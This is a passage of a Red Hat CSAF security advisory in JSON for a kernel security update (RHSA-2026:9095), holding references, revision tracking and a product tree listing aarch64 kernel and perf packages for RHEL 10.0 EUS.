"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:9095",
"url": "https://access.redhat.com/errata/RHSA-2026:9095"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2436805",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436805"
},
{
"category": "external",
"summary": "2439887",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439887"
},
{
"category": "external",
"summary": "2439951",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439951"
},
{
"category": "external",
"summary": "2444376",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444376"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9095.json"
}
],
"title": "Red Hat Security Advisory: kernel security update",
"tracking": {
"current_release_date": "2026-05-06T20:36:30+00:00",
"generator": {
"date": "2026-05-06T20:36:30+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.9"
}
},
"id": "RHSA-2026:9095",
"initial_release_date": "2026-04-20T18:30:02+00:00",
"revision_history": [
{
"date": "2026-04-20T18:30:02+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-20T18:30:02+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-06T20:36:30+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product": {
"name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product": {
"name": "Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product": {
"name": "Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel-matched@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel-matched@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-aarch64@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt-addons@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
